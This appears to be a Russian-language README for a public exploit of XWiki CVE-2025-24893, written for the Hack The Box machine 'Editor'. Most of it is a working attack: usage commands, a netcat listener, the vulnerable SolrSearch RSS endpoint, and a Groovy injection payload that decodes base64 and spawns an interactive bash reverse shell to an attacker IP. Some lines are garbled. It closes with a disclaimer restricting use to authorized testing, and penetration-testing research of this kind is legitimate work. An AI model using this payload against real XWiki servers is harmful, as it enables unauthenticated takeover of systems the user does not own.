
Эксплойт неаутентифицированного RCE для XWiki CVE-2025-24893 через внедрение Groovy-скриптов
Эксплойт для неаутентифицированного удаленного выполнения кода на версиях XWiki, уязвимых к CVE-2025-24893.
Версии XWiki до 15.10.9 уязвимы к неаутентифицированному RCE через внедрение Groovy-скриптов в обработчик RSS-лент SolrSearch. Уязвимость возникает из-за того, что XWiki не выполняет должную санитацию пользовательского ввода в параметре text, позволяя злоумышленникам выйти из контекста RSS и внедрить произвольный Groovy-код.
CVE ID: CVE-2025-24893
Оценка CVSS: 9.8 (Критический)
Затронутые версии: XWiki < 15.10.9
requests)pip3 install requests
python3 exploit.py <target_url> <attacker_ip> <listener_port>
Пример:
# Start listener on attacker machine
nc -lvnp 9001
# Run exploit
python3 exploit.py http://10.10.11.80:8080 10.10.14.5 9001
}}}}}}{{{{groovy}}}})/xwiki/bin/get/Main/SolrSearch?media=rss&text=<payload>Эксплойт нацелен на следующий endpoint:
/xwiki/bin/get/Main/SolrSearch?media=rss&text=
Уязвимость позволяет выйти из контекста RSS-ленты:
}}}}}}{{{{async async=false}}}}{{{{groovy}}}}
"bash -c {echo,<base64_payload>}|{base64,-d}|{bash,-i}".execute()
{{{{/groovy}}}}{{{{/async}}}}
Этот инструмент предназначен только для образовательных целей и авторизованного тестирования на проникновение. Автор не несет ответственности за любое неправомерное использование или ущерб, причиненный этой программой. Используйте этот эксплойт только против систем, которыми вы владеете или на тестирование которых имеете явное разрешение.
Лицензия MIT — Подробности в файле LICENSE
Создано для HTB box "Editor"
Примечание: Всегда убедитесь, что у вас есть соответствующее разрешение перед тестированием любых систем.